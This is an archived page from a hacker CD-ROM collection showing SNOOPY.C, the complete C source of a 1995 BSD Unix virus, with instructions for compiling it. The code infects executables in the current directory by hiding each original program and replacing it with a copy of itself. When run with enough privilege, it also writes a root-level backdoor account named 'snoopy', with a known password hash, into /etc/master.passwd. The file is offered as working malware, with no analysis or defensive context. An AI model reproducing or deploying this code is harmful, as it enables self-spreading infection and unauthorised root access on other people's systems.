home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / gbbdisk.arj / SNOOPY / SNOOPY.C next >
Encoding:
C/C++ Source or Header  |  1995-08-01  |  5.8 KB  |  135 lines
  1. /* The Snoopy Virus for BSD Free Unix 2.0.2 (and others)           */
  2. /* (C) 1995 American Eagle Publications, Inc. All rights reserved! */
  3. /* Compile with Gnu C, "gcc snoopy.c"                              */
  4.  
  5. #include <stdio.h>
  6. #include <sys/types.h>
  7. #include <dirent.h>
  8. #include <sys/stat.h>
  9.  
  10. DIR *dirp;                            /* directory search structure */
  11. struct dirent *dp;                    /* directory entry record */
  12. struct stat st;                       /* file status record */
  13. int stst;                             /* status call status */
  14. FILE *host,*virus, *pwf;              /* host and virus files. */
  15. long FileID;                          /* 1st 4 bytes of host */
  16. char buf[512];                        /* buffer for disk reads/writes */
  17. char *lc,*ld;                         /* used to search for X23 */
  18. size_t amt_read,hst_size;             /* amount read from file, host size */
  19. size_t vir_size=13264;                /* size of X23, in bytes */
  20. char dirname[10];                     /* subdir where X23 stores itself */
  21. char hst[512];
  22.  
  23. /* snoopy super user entry for the password file, pw='A Snoopy Dog.' */
  24. char snoopy[]="snoopy:$1$LOARloMh$fmBvM4NKD2lcLvjhN5GjF.:0:0::0:0:Nobody:/root:";
  25.  
  26. void readline() {
  27.   lc=&buf[1];
  28.   buf[0]=0;
  29.   while (*(lc-1)!=10) {
  30.     fread(lc,1,1,pwf);
  31.     lc++;
  32.     }
  33.   }
  34.  
  35. void writeline() {
  36.   lc=&buf[1];
  37.   while (*(lc-1)!=10) {
  38.     fwrite(lc,1,1,host);
  39.     lc++;
  40.     }
  41.   }
  42.  
  43. int main(argc, argv, envp)
  44.   int argc;
  45.   char *argv[], *envp[];
  46.   {
  47.     strcpy((char *)&dirname,"./\005");         /* set up host directory name */
  48.     dirp=opendir(".");                              /* begin directory search */
  49.     while ((dp=readdir(dirp))!=NULL) {           /* have a file, check it out */
  50.       if ((stst=stat((const char *)&dp->d_name,&st))==0) {      /* get status */
  51.         lc=(char *)&dp->d_name;
  52.         while (*lc!=0) lc++;
  53.         lc=lc-3;                    /* lc points to last 3 chars in file name */
  54.         if ((!((*lc=='X')&&(*(lc+1)=='2')&&(*(lc+2)=='3')))         /* "X23"? */
  55.                  &&(st.st_mode&S_IXUSR!=0)) {              /* and executable? */
  56.           strcpy((char *)&buf,(char *)&dirname);
  57.           strcat((char *)&buf,"/");
  58.           strcat((char *)&buf,(char *)&dp->d_name);        /* see if X23 file */
  59.           strcat((char *)&buf,".X23");                      /* exists already */
  60.           if ((host=fopen((char *)&buf,"r"))!=NULL) fclose(host);
  61.           else {                                   /* no it doesn't - infect! */
  62.             host=fopen((char *)&dp->d_name,"r");
  63.             fseek(host,0L,SEEK_END);                   /* determine host size */
  64.             hst_size=ftell(host);
  65.             fclose(host);
  66.             if (hst_size>=vir_size) {        /* host must be large than virus */
  67.  
  68.               mkdir((char *)&dirname,S_IRWXU|S_IRWXG|S_IRWXO);
  69.               rename((char *)&dp->d_name,(char *)&buf);        /* rename host */
  70.               if ((virus=fopen(argv[0],"r"))!=NULL) {
  71.                 if ((host=fopen((char *)&dp->d_name,"w"))!=NULL) {
  72.                   while (!feof(virus)) {            /* and copy virus to orig */
  73.                     amt_read=512;                                /* host name */
  74.                     amt_read=fread(&buf,1,amt_read,virus);
  75.                     fwrite(&buf,1,amt_read,host);
  76.                     hst_size=hst_size-amt_read;
  77.                     }
  78.                   fwrite(&buf,1,hst_size,host);
  79.                   fclose(host);
  80.                   chmod((char *)&dp->d_name,S_IRWXU|S_IRWXG|S_IRWXO);
  81.                   strcpy((char *)&buf,(char *)&dirname);
  82.                   strcpy((char *)&buf,"/");
  83.                   strcat((char *)&buf,(char *)&dp->d_name);
  84.                   chmod((char *)&buf,S_IRWXU|S_IRWXG|S_IRWXO);
  85.                   }
  86.                 else
  87.                   rename((char *)&buf,(char *)&dp->d_name);
  88.                 fclose(virus);                  /* infection process complete */
  89.                 }                                            /* for this file */
  90.               else
  91.                 rename((char *)&buf,(char *)&dp->d_name);
  92.               }
  93.             }
  94.           }
  95.         }
  96.       }
  97.     (void)closedir(dirp);          /* infection process complete for this dir */
  98.  
  99.                                 /* now see if we can get at the password file */
  100.     if ((pwf=fopen("/etc/master.passwd","r+"))!=NULL) {
  101.       host=fopen("/etc/mast.pw","w");                       /* temporary file */
  102.       stst=0;
  103.       while (!feof(pwf)) {
  104.         readline();                        /* scan the file for user "snoopy" */
  105.         lc=&buf[1];
  106.         if ((*lc=='s')&&(*(lc+1)=='n')&&(*(lc+2)=='o')&&(*(lc+3)=='o')&&
  107.             (*(lc+4)=='p')&&(*(lc+5)=='y')) stst=1;
  108.         writeline();
  109.         }
  110.       if (stst==0) {                                  /* if no "snoopy" found */
  111.         strcpy((char *)&buf[1],(char *)&snoopy);                   /* add it! */
  112.         lc=&buf[1]; while (*lc!=0) lc++;
  113.         *lc=10;
  114.         writeline();
  115.         }
  116.       fclose(host);
  117.       fclose(pwf);
  118.       rename("/etc/mast.pw","/etc/master.passwd");    /* update master.passwd */
  119.       }
  120.  
  121.     strcpy((char *)&buf,argv[0]);          /* the host is this program's name */
  122.     lc=(char *)&buf;                            /* find end of directory path */
  123.     while (*lc!=0) lc++;
  124.     while (*lc!='/') lc--;
  125.     *lc=0; lc++;
  126.     strcpy((char *)&hst,(char *)&buf);
  127.     ld=(char *)&dirname+1;                         /* insert the ^E directory */
  128.     strcat((char *)&hst,(char *)ld);          /* and put file name on the end */
  129.     strcat((char *)&hst,"/");
  130.     strcat((char *)&hst,(char *)lc);
  131.     strcat((char *)&hst,".X23");                     /* with an X23 tacked on */
  132.  
  133.     execve((char *)&hst,argv,envp);            /* execute this program's host */
  134.     }
  135.